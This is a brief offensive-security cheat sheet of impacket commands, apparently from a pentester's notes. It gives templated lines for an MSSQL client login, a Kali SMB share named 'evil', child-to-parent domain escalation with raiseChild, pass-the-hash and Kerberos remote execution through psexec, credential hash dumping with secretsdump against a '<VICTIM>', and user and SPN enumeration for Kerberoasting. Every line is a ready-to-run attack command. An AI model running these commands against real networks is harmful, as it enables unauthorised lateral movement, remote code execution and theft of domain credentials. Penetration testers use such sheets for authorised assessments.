% impacket

# mssqlclient
impacket-mssqlclient -port <RPORT> '<USERNAME>:<PASS>@<RHOST>'

# smbserver (share on kali)
impacket-smbserver -smb2support evil $PWD

# smbserver (password share on kali)
impacket-smbserver -smb2support -username evil -password evil evil $PWD

# raiseChild
impacket-raiseChild -hashes <LMHASH>:<NTHASH> <CHILD_DOMAIN>/<ADMIN_USER>
impacket-raiseChild -hashes <LMHASH>:<NTHASH> <CHILD_DOMAIN>/<ADMIN_USER>:'<PASS>'

# psexec
impacket-psexec <DOMAIN>/<ADMIN>@<HOSTNAME>.<ETC_HOST_FQDN> -hashes <HASH>
impacket-psexec <DOMAIN>/<ADMIN>:<PASSWORD>@<HOSTNAME>.<ETC_HOST_FQDN> -hashes <HASH>

# psexec via env KRB5CCNAME
impacket-psexec -k -no-pass <HOSTNAME>.<ETC_HOST_FQDN>

# secretsdump
impacket-secretsdump <DOMAIN>/<VICTIM>@<ETC_HOST_FQDN> -hashes <LMHASH>:<NTHASH>

# GetADUsers
impacket-GetADUsers -all -k -no-pass -dc-ip <FQDN> <DOMAIN>/<VICTIM>

# GetUserSPNs
impacket-GetUserSPNs -all -k -no-pass -dc-ip <FQDN> <DOMAIN>/<VICTIM>

